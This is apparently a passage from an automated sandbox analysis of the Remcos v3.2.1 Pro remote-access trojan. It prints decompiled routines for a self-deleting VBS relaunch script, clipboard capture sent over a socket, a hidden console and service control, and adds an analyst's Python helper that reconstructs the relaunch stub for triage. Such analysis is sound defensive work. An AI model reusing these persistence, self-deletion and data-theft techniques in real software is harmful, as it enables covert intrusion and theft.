                                    				E006D1F6D(_t79,  &_v28);
                                    				_t54 = E006D427F(_t79,  &_v196, L"\"\"\", 0");
                                    				E006D3311(E006D30A6(_t79,  &_v76, E006D3030( &_v52, E006D30A6(_t79,  &_v148, E006D427F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D766C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                                    				_t67 = E006D1EEB( &_v100);
                                    				_t68 = E006D2489();
                                    				if(E006E7947(E006D1EEB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E006D1EEB( &_v100), 0x72f724, 0x72f724, 0) > 0x20) {
                                    					ExitProcess(0);
                                    				}
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				return E006D1EF0();
                                    			}

                                    0x006db488
                                    0x006db493
                                    0x006db49f
                                    0x006db4a7
                                    0x006db4cb
                                    0x006db4d5
                                    0x006db4d7
                                    0x006db4e2
                                    0x006db4e2
                                    0x006db504
                                    0x006db50d
                                    0x006db515
                                    0x006db547
                                    0x006db550
                                    0x006db558
                                    0x006db560
                                    0x006db575
                                    0x006db5ba
                                    0x006db5c2
                                    0x006db5ca
                                    0x006db5d5
                                    0x006db5e0
                                    0x006db5eb
                                    0x006db5f8
                                    0x006db601
                                    0x006db60a
                                    0x006db628
                                    0x006db64d
                                    0x006db64d
                                    0x006db656
                                    0x006db65e
                                    0x006db670

                                    APIs
                                      • Part of subcall function 006E015B: TerminateProcess.KERNEL32(00000000,?,006DAD95), ref: 006E016B
                                      • Part of subcall function 006E015B: WaitForSingleObject.KERNEL32(000000FF,?,006DAD95), ref: 006E017E
                                      • Part of subcall function 006E0A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 006E0A4C
                                      • Part of subcall function 006E0A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 006E0A65
                                      • Part of subcall function 006E0A30: RegCloseKey.ADVAPI32(00000000), ref: 006E0A70
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 006DB4E2
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0072F724,0072F724,00000000), ref: 006DB641
                                    • ExitProcess.KERNEL32 ref: 006DB64D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                    • API String ID: 1913171305-2411266221
                                    • Opcode ID: bcdfd1da23f3988aaa033fa4065c73ce46e2ed488cf34c0c1a264f1358abb193
                                    • Instruction ID: d1b133f586f50b0808df64660b0e1f4f659f7cd0b4b29ab159efa4701c7acaa0
                                    • Opcode Fuzzy Hash: bcdfd1da23f3988aaa033fa4065c73ce46e2ed488cf34c0c1a264f1358abb193
                                    • Instruction Fuzzy Hash: AE414371D141186BDB54F7A0EC62DEE777BAF61700F00012FF406A6292EE645E46CA98
                                    Uniqueness

                                    Uniqueness Score: -1.00%
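E006DB488 is the restart path: after E006E015B terminates and waits on a process handle, it reads the REG_SZ value "exepath" from a HKCU subkey (RegOpenKeyExA with 0x80000001 and KEY_READ = 0x20019; the subkey name comes from a config string not visible here) into a 0x208-byte buffer, falling back to GetModuleFileNameW. It builds %Temp%\<name>.vbs (the name is produced by E006E7093 and is assumed to be derived from the executable's own file name), writes a two-line script that launches the executable through `cmd /c` and then deletes itself, opens it with ShellExecuteW("open"), and calls ExitProcess(0) when the return value is above 32 (the ShellExecute success range). The write size handed to E006E7947 is twice the string length, which suggests the script is written as wide characters; that is an assumption. The helper below, added here as an example and not code from the report or the sample, reconstructs the exact script body from the string IDs above so a recovered .vbs can be compared against it, and extracts the path of the executable it relaunches. The sample path and file bytes are constructed.

```python
import re

# Pieces of the script exactly as the routine concatenates them (see the String ID list above).
RUN_PREFIX = 'CreateObject("WScript.Shell").Run "cmd /c ""'
RUN_SUFFIX = '""", 0'
DELETE_LINE = 'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)'

# Registry lookup the routine tries first; the subkey itself is not visible in this listing.
REG_VALUE_NAME = "exepath"
EXEPATH_BUFFER_BYTES = 0x208   # 520 bytes = MAX_PATH wide characters, also the GetModuleFileNameW size

_STUB = re.compile(
    "^" + re.escape(RUN_PREFIX) + r"(?P<exe>.+?)" + re.escape(RUN_SUFFIX) + r"\r?\n"
    + re.escape(DELETE_LINE) + r"\s*$"
)


def build_restart_script(exepath: str) -> str:
    """Reconstruct the script body the routine writes, for hashing or diffing against a recovered file."""
    return RUN_PREFIX + exepath + RUN_SUFFIX + "\n" + DELETE_LINE


def decode_script(raw: bytes) -> str:
    """Accept UTF-16LE with or without BOM (the doubled write size suggests wide chars) and plain ANSI."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    if len(raw) >= 2 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def extract_restarted_exe(script_text: str):
    """Return the relaunched executable's path if the text is this restart stub, else None."""
    m = _STUB.match(script_text)
    return m.group("exe") if m else None


def triage_vbs(raw: bytes):
    """Decode a .vbs recovered from %Temp% and pull out the path it would relaunch."""
    return extract_restarted_exe(decode_script(raw))


# Constructed example: a script as it might be recovered from %Temp% (not a file from the sample's run).
SAMPLE_EXE = r"C:\Users\victim\AppData\Roaming\updater\updater.exe"
SAMPLE_VBS_UTF16 = build_restart_script(SAMPLE_EXE).encode("utf-16-le")

if __name__ == "__main__":
    print(triage_vbs(SAMPLE_VBS_UTF16))
```

On a live host the path returned by `triage_vbs` is the binary to collect next, and the registry value named in `REG_VALUE_NAME` under the sample's HKCU subkey is worth checking because it can point somewhere other than the file that dropped the script.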

                                    C-Code - Quality: 100%
                                    			E0070558A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                    				int _v8;
                                    				int _v12;
                                    				char _v16;
                                    				intOrPtr _v24;
                                    				char _v28;
                                    				void* __ebx;
                                    				char* _t31;
                                    				int _t35;
                                    				int _t43;
                                    				void* _t51;
                                    				int _t52;
                                    				int _t54;
                                    				void* _t56;
                                    				void* _t63;
                                    				short* _t64;
                                    				short* _t67;
                                    
                                    				_t62 = __edx;
                                    				E00705507(_t51,  &_v28, __edx, _a24);
                                    				_t52 = 0;
                                    				_t54 =  *(_v24 + 0x14);
                                    				_t31 = _a4;
                                    				_v8 = _t54;
                                    				if(_t31 == 0) {
                                    					L4:
                                    					 *((intOrPtr*)(E0070A504())) = 0x16;
                                    					E0070695D();
                                    					L18:
                                    					if(_v16 != 0) {
                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                    					}
                                    					return _t52;
                                    				}
                                    				_t66 = _a8;
                                    				if(_a8 == 0) {
                                    					goto L4;
                                    				}
                                    				 *_t31 = 0;
                                    				if(_a12 == 0 || _a16 == 0) {
                                    					goto L4;
                                    				} else {
                                    					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                                    					_v12 = _t35;
                                    					if(_t35 != 0) {
                                    						_t64 = E0070F98C(_t54, _t35 + _t35);
                                    						_t56 = _t63;
                                    						if(_t64 != 0) {
                                    							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                                    								_t67 = E0070F98C(_t56, _t66 + _t66);
                                    								if(_t67 != 0) {
                                    									_t43 = E00711453(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                                    									_v12 = _t43;
                                    									if(_t43 != 0) {
                                    										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                                    											_t52 = _v12;
                                    										} else {
                                    											E0070A4CE(GetLastError());
                                    										}
                                    									}
                                    								}
                                    								E007101F5(_t67);
                                    							} else {
                                    								E0070A4CE(GetLastError());
                                    							}
                                    						}
                                    						E007101F5(_t64);
                                    					} else {
                                    						E0070A4CE(GetLastError());
                                    					}
                                    					goto L18;
                                    				}
                                    			}

                                    0x0070558a
                                    0x0070559a
                                    0x007055a2
                                    0x007055a4
                                    0x007055a7
                                    0x007055aa
                                    0x007055af
                                    0x007055c4
                                    0x007055c9
                                    0x007055cf
                                    0x007056a1
                                    0x007056a5
                                    0x007056aa
                                    0x007056aa
                                    0x007056b8
                                    0x007056b8
                                    0x007055b1
                                    0x007055b6
                                    0x00000000
                                    0x00000000
                                    0x007055b8
                                    0x007055bd
                                    0x00000000
                                    0x007055d9
                                    0x007055e2
                                    0x007055e8
                                    0x007055ed
                                    0x0070560a
                                    0x0070560c
                                    0x0070560f
                                    0x0070562a
                                    0x00705643
                                    0x00705648
                                    0x00705658
                                    0x00705660
                                    0x00705665
                                    0x0070567e
                                    0x0070568f
                                    0x00705680
                                    0x00705687
                                    0x0070568c
                                    0x0070567e
                                    0x00705665
                                    0x00705693
                                    0x0070562c
                                    0x00705633
                                    0x00705633
                                    0x00705698
                                    0x0070569a
                                    0x007055ef
                                    0x007055f6
                                    0x007055fb
                                    0x00000000
                                    0x007055ed

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007055E2
                                    • GetLastError.KERNEL32(?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 007055EF
                                    • __dosmaperr.LIBCMT ref: 007055F6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00705622
                                    • GetLastError.KERNEL32(?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0070562C
                                    • __dosmaperr.LIBCMT ref: 00705633
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,006D1D39,?), ref: 00705676
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,006D1D39,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00705680
                                    • __dosmaperr.LIBCMT ref: 00705687
                                    • _free.LIBCMT ref: 00705693
                                    • _free.LIBCMT ref: 0070569A
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: c4da37877533cc31edeb61b8f075563da9d58036e6ad65e7b4c8227bb99d4687
                                    • Instruction ID: b44ae24e6a4ab77e5cecea2b284017dbb9f50157e5db767d3e10d66352549515
                                    • Opcode Fuzzy Hash: c4da37877533cc31edeb61b8f075563da9d58036e6ad65e7b4c8227bb99d4687
                                    • Instruction Fuzzy Hash: 95318B7280064AFFDF11AFA4CC49DAF7BA9AF05720B504258F914961D0DB3E8D61DFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 76%
                                    			E006D53ED(char* __edx, void* __eflags, intOrPtr _a4) {
                                    				struct tagMSG _v52;
                                    				void* _v56;
                                    				char _v60;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v104;
                                    				char _v108;
                                    				void* _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v140;
                                    				void* _v176;
                                    				void* __ebx;
                                    				void* __ebp;
                                    				intOrPtr* _t28;
                                    				char* _t36;
                                    				intOrPtr _t45;
                                    				intOrPtr _t46;
                                    				void* _t57;
                                    				intOrPtr _t69;
                                    				void* _t111;
                                    				void* _t113;
                                    				void* _t115;
                                    				signed int _t117;
                                    				void* _t120;
                                    				void* _t121;
                                    				void* _t122;
                                    				void* _t123;
                                    
                                    				_t125 = __eflags;
                                    				_t101 = __edx;
                                    				_t69 = _a4;
                                    				E006D20EC(_t69,  &_v104, __edx, __eflags, _t69 + 0x1c);
                                    				SetEvent( *(_t69 + 0x34));
                                    				_t28 = E006D1F95( &_v108);
                                    				E006D42A6( &_v108,  &_v60, 4, 0xffffffff);
                                    				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                                    				E006D20EC(_t69, _t120, _t101, _t125, 0x73c238);
                                    				_t121 = _t120 - 0x18;
                                    				E006D20EC(_t69, _t121, _t101, _t125,  &_v76);
                                    				E006E7478( &_v140, _t101);
                                    				_t122 = _t121 + 0x30;
                                    				_t111 =  *_t28 - 0x3a;
                                    				if(_t111 == 0) {
                                    					E006D1E49( &_v116, _t101, __eflags, 0);
                                    					_t36 = E006D2489();
                                    					E006D1F95(E006D1E49( &_v120, _t101, __eflags, 0));
                                    					_t101 = _t36;
                                    					_t113 = E006DF69B();
                                    					__eflags = _t113;
                                    					if(_t113 == 0) {
                                    						L7:
                                    						E006D1E74( &_v116, _t101);
                                    						E006D1FC7();
                                    						E006D1FC7();
                                    						__eflags = 0;
                                    						return 0;
                                    					}
                                    					 *0x73baec = E006DF931(_t113, "DisplayMessage");
                                    					_t45 = E006DF931(_t113, "GetMessage");
                                    					_t104 = "CloseChat";
                                    					 *0x73bae4 = _t45;
                                    					_t46 = E006DF931(_t113, "CloseChat");
                                    					_t123 = _t122 - 0x18;
                                    					 *0x73bae8 = _t46;
                                    					 *0x73bae1 = 1;
                                    					E006D20EC(_t69, _t123, "CloseChat", __eflags, 0x73c2b8);
                                    					_push(0x74);
                                    					E006D4AA4(_t69, _t69, _t104, __eflags);
                                    					L10:
                                    					_t115 = HeapCreate(0, 0, 0);
                                    					__eflags =  *0x73bae4(_t115,  &_v140);
                                    					if(__eflags != 0) {
                                    						_t123 = _t123 - 0x18;
                                    						E006D20AB(_t69, _t123, _t104, __eflags, _v140, _t51);
                                    						_push(0x3b);
                                    						E006D4AA4(_t69, _t69, _t104, __eflags);
                                    						HeapFree(_t115, 0, _v176);
                                    					}
                                    					goto L10;
                                    				}
                                    				_t127 = _t111 != 1;
                                    				if(_t111 != 1) {
                                    					goto L7;
                                    				}
                                    				_t57 =  *0x73baec(E006D1F95(E006D1E49( &_v116, _t101, _t127, 0)));
                                    				_t128 = _t57;
                                    				if(_t57 == 0) {
                                    					goto L7;
                                    				}
                                    				E006D427F(_t69,  &_v80, 0x72f6b8);
                                    				_t101 =  &_v84;
                                    				E006E739C(_t69, _t122 - 0x18,  &_v84);
                                    				_push(0x3b);
                                    				E006D4AA4(_t69, _t69,  &_v84, _t128);
                                    				E006D1EF0();
                                    				L4:
                                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                                    					TranslateMessage( &_v52);
                                    					DispatchMessageA( &_v52);
                                    				}
                                    				if(__eflags < 0) {
                                    					goto L4;
                                    				}
                                    				goto L7;
                                    			}

                                    0x006d53ed
                                    0x006d53ed
                                    0x006d53fb
                                    0x006d5404
                                    0x006d540c
                                    0x006d5416
                                    0x006d542a
                                    0x006d542f
                                    0x006d5439
                                    0x006d543e
                                    0x006d5448
                                    0x006d5451
                                    0x006d5456
                                    0x006d5459
                                    0x006d545c
                                    0x006d550b
                                    0x006d5512
                                    0x006d5525
                                    0x006d552a
                                    0x006d5533
                                    0x006d5535
                                    0x006d5537
                                    0x006d54e0
                                    0x006d54e4
                                    0x006d54ed
                                    0x006d54f6
                                    0x006d54fd
                                    0x006d5503
                                    0x006d5503
                                    0x006d554a
                                    0x006d5551
                                    0x006d5556
                                    0x006d555b
                                    0x006d5562
                                    0x006d5567
                                    0x006d556a
                                    0x006d5571
                                    0x006d557d
                                    0x006d5582
                                    0x006d5586
                                    0x006d558b
                                    0x006d5594
                                    0x006d55a4
                                    0x006d55a6
                                    0x006d55a8
                                    0x006d55b2
                                    0x006d55b7
                                    0x006d55bb
                                    0x006d55c6
                                    0x006d55c6
                                    0x00000000
                                    0x006d55a6
                                    0x006d5462
                                    0x006d5465
                                    0x00000000
                                    0x00000000
                                    0x006d547b
                                    0x006d5482
                                    0x006d5484
                                    0x00000000
                                    0x00000000
                                    0x006d548f
                                    0x006d5497
                                    0x006d549d
                                    0x006d54a2
                                    0x006d54a6
                                    0x006d54af
                                    0x00000000
                                    0x006d54b4
                                    0x006d54cb
                                    0x006d54d6
                                    0x006d54d6
                                    0x006d54de
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 006D540C
                                    • GetMessageA.USER32 ref: 006D54BC
                                    • TranslateMessage.USER32(?), ref: 006D54CB
                                    • DispatchMessageA.USER32 ref: 006D54D6
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0073C2B8), ref: 006D558E
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 006D55C6
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 2bf495a2b348a700319fbc958722bf78542b9bc87cd77b7f459b4910d88e3049
                                    • Instruction ID: 109f2e6225d7cb3ca953ffacce21d0c0fa99533a75632c9054b89d7b35b47a4a
                                    • Opcode Fuzzy Hash: 2bf495a2b348a700319fbc958722bf78542b9bc87cd77b7f459b4910d88e3049
                                    • Instruction Fuzzy Hash: FC41D231E04601ABC754FB74DC5686F7BEAAB86700F40452EF90297792EF388A05C79A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E006E805B(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v524;
                                    				char _v544;
                                    				char _v560;
                                    				char _v572;
                                    				void* _v576;
                                    				char _v580;
                                    				char _v584;
                                    				char _v600;
                                    				char _v608;
                                    				char _v616;
                                    				char _v620;
                                    				void* _v624;
                                    				char _v628;
                                    				char _v632;
                                    				char _v636;
                                    				char _v644;
                                    				void* _v648;
                                    				char _v652;
                                    				void* _v672;
                                    				void* __ebx;
                                    				signed int _t36;
                                    				void* _t39;
                                    				void* _t40;
                                    				void* _t77;
                                    
                                    				_t73 = __edx;
                                    				_t77 = __ecx;
                                    				_t54 = __edx;
                                    				E006D1F6D(__edx,  &_v644);
                                    				_t36 = __edx + 0xffffffd0;
                                    				_t85 = _t36 - 7;
                                    				if(_t36 <= 7) {
                                    					switch( *((intOrPtr*)(_t36 * 4 +  &M006E8237))) {
                                    						case 0:
                                    							_push(L"Temp");
                                    							goto L14;
                                    						case 1:
                                    							__ecx =  &_v620;
                                    							__eax = E006E6D45(__ebx,  &_v620);
                                    							__ecx =  &_v644;
                                    							__eax = E006D1EFA( &_v644, __edx, __esi, __eax);
                                    							goto L4;
                                    						case 2:
                                    							_push(L"SystemDrive");
                                    							goto L14;
                                    						case 3:
                                    							_push(L"WinDir");
                                    							goto L14;
                                    						case 4:
                                    							__eax = E006E7614(__ecx);
                                    							__eflags = __al;
                                    							if(__eflags != 0) {
                                    								__ecx =  &_v620;
                                    								E006D427F(__ebx, __ecx, L"\\SysWOW64") = E0070987F(__ebx, __ecx, __eflags, L"WinDir");
                                    								__ecx =  &_v600;
                                    								__edx = __eax;
                                    								__ecx =  &_v580;
                                    								__eax = E006D3030( &_v580, __edx, __eax);
                                    								__ecx =  &_v652;
                                    								__eax = E006D1EFA( &_v652, __edx, __esi, __eax);
                                    								__ecx =  &_v584;
                                    								__eax = E006D1EF0();
                                    								__ecx =  &_v608;
                                    								__eax = E006D1EF0();
                                    								L4:
                                    								__ecx =  &_v620;
                                    								goto L5;
                                    							} else {
                                    								__ecx =  &_v572;
                                    								E006D427F(__ebx, __ecx, L"\\system32") = E0070987F(__ebx, __ecx, __eflags, L"WinDir");
                                    								__ecx =  &_v600;
                                    								__edx = __eax;
                                    								__ecx =  &_v628;
                                    								__eax = E006D3030( &_v628, __edx, __eax);
                                    								__ecx =  &_v652;
                                    								__eax = E006D1EFA( &_v652, __edx, __esi, __eax);
                                    								__ecx =  &_v632;
                                    								__eax = E006D1EF0();
                                    								__ecx =  &_v608;
                                    								__eax = E006D1EF0();
                                    								__ecx =  &_v584;
                                    								L5:
                                    								__eax = E006D1EF0();
                                    								goto L15;
                                    							}
                                    							L16:
                                    						case 5:
                                    							_push(L"ProgramFiles");
                                    							goto L14;
                                    						case 6:
                                    							_push(L"AppData");
                                    							goto L14;
                                    						case 7:
                                    							_push(L"UserProfile");
                                    							L14:
                                    							E006D9DC9(_t54,  &_v644, E0070987F(_t54, _t57, _t85));
                                    							goto L15;
                                    					}
                                    				}
                                    				L15:
                                    				__imp__GetLongPathNameW(E006D1EEB( &_v644),  &_v524, 0x208);
                                    				_t39 = E006D427F(_t54,  &_v560, _a4);
                                    				_t40 = E006D427F(_t54,  &_v636, "\\");
                                    				E006D3030(_t77, E006D3030( &_v600, E006E83F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				E006D1EF0();
                                    				return _t77;
                                    				goto L16;
                                    			}

                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 006E81B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-1609423294
                                    • Opcode ID: 8c21b4ccf1d7ef676d74704ebca54289c0ff4b1f4f2ed080e74eeafc24a12998
                                    • Instruction ID: 57db69d0c6b6076d3202652d69dc8e29503de1a906410b92b411ef62f3c55dc9
                                    • Opcode Fuzzy Hash: 8c21b4ccf1d7ef676d74704ebca54289c0ff4b1f4f2ed080e74eeafc24a12998
                                    • Instruction Fuzzy Hash: DE418971518380AFD244F761DC52CAFB3ABAEA1740F10092EF856572E2EE749E0AC656
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(?,open,00000000,0072F724,0072F724), ref: 006DB0D4
                                    • ExitProcess.KERNEL32 ref: 006DB0DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteExitProcessShell
                                    • String ID: ")$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1124553745-1689998264
                                    • Opcode ID: a251feea6881335c88f37454ca3f049beece1eb890b20897489df2b4af37195d
                                    • Instruction ID: 1c4d0c780e8553aa3f041cfd62a354137e83f0f6d47f86679c12664b20a384a9
                                    • Opcode Fuzzy Hash: a251feea6881335c88f37454ca3f049beece1eb890b20897489df2b4af37195d
                                    • Instruction Fuzzy Hash: 99312E71D14158ABCB55F7A0ECA6CEE737BAE61700F00012FF816673D2EE602E46C698
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 59%
                                    			E006E8F59(void* __ebx, void* __ecx, void* __edx) {
                                    				char _v204;
                                    				void* __edi;
                                    				struct HWND__* _t17;
                                    				void _t22;
                                    				intOrPtr _t24;
                                    				intOrPtr _t25;
                                    				void _t26;
                                    				void _t28;
                                    				void* _t30;
                                    				void* _t34;
                                    				signed int _t37;
                                    				void* _t45;
                                    				void* _t47;
                                    				void* _t51;
                                    				void* _t53;
                                    				void* _t55;
                                    				void* _t59;
                                    
                                    				_t36 = __ecx;
                                    				_t34 = __ecx;
                                    				AllocConsole();
                                    				_t17 =  *0x73ca84(__ebx);
                                    				 *0x73bebc = _t17;
                                    				if(_t34 == 0) {
                                    					ShowWindow(_t17, 0);
                                    				}
                                    				_push(_t45);
                                    				E0070BCA5(_t36, "CONOUT$", "a", E00706A85(1));
                                    				E00701F00(_t45,  &_v204, 0, 0xc8);
                                    				_t47 =  &_v204 - 1;
                                    				do {
                                    					_t22 =  *(_t47 + 1);
                                    					_t47 = _t47 + 1;
                                    				} while (_t22 != 0);
                                    				_t37 = 7;
                                    				memcpy(_t47, "--------------------------\n", _t37 << 2);
                                    				_t51 =  &_v204 - 1;
                                    				do {
                                    					_t24 =  *((intOrPtr*)(_t51 + 1));
                                    					_t51 = _t51 + 1;
                                    				} while (_t24 != 0);
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				_t53 =  &_v204 - 1;
                                    				do {
                                    					_t25 =  *((intOrPtr*)(_t53 + 1));
                                    					_t53 = _t53 + 1;
                                    				} while (_t25 != 0);
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				_t55 =  &_v204 - 1;
                                    				do {
                                    					_t26 =  *(_t55 + 1);
                                    					_t55 = _t55 + 1;
                                    				} while (_t26 != 0);
                                    				_push(6);
                                    				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
                                    				asm("movsw");
                                    				_t59 =  &_v204 - 1;
                                    				do {
                                    					_t28 =  *(_t59 + 1);
                                    					_t59 = _t59 + 1;
                                    					_t85 = _t28;
                                    				} while (_t28 != 0);
                                    				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
                                    				asm("movsb");
                                    				return E006D482E(_t85, _t30, 7);
                                    			}

                                    APIs
                                    • AllocConsole.KERNEL32(00000001), ref: 006E8F65
                                    • GetConsoleWindow.KERNEL32 ref: 006E8F6B
                                    • ShowWindow.USER32(00000000,00000000), ref: 006E8F7E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleWindow$AllocShow
                                    • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.2.1 Pro$CONOUT$
                                    • API String ID: 3461962499-1433448479
                                    • Opcode ID: d7e9f75a28b0f9b673c527a06bb318d09f4a9f07fcc74a353b67d647bb101d43
                                    • Instruction ID: 5bc5b3ea0a1dc71ef06f09c4e74b5159b1ac3df033b7532c8cbcf81bff710b9e
                                    • Opcode Fuzzy Hash: d7e9f75a28b0f9b673c527a06bb318d09f4a9f07fcc74a353b67d647bb101d43
                                    • Instruction Fuzzy Hash: 19217C32909B415AFF209F155C05FC6BB9BAF52740F404291F88C7F182CFA62D8A4BB4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32 ref: 006E2D6E
                                    • EmptyClipboard.USER32 ref: 006E2D7C
                                    • CloseClipboard.USER32 ref: 006E2D82
                                    • OpenClipboard.USER32 ref: 006E2D89
                                    • GetClipboardData.USER32 ref: 006E2D99
                                    • GlobalLock.KERNEL32 ref: 006E2DA2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2DAB
                                    • CloseClipboard.USER32 ref: 006E2DB1
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: 8Em
                                    • API String ID: 2172192267-1798622111
                                    • Opcode ID: cf75a23305c89af3299c0825166c37ba4ea22b95d072e528124f6f36cc5532e5
                                    • Instruction ID: 4cd25c4044bd87502e117474a6fcab270924c749afe4f001818b51264bb0638c
                                    • Opcode Fuzzy Hash: cf75a23305c89af3299c0825166c37ba4ea22b95d072e528124f6f36cc5532e5
                                    • Instruction Fuzzy Hash: 9A0144316043509BC354FB71DC49AAEB7A6BF95301F40452EF856C63A2DF788B06CA59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,006E5E19,00000000), ref: 006E6481
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,006E5E19,00000000), ref: 006E6498
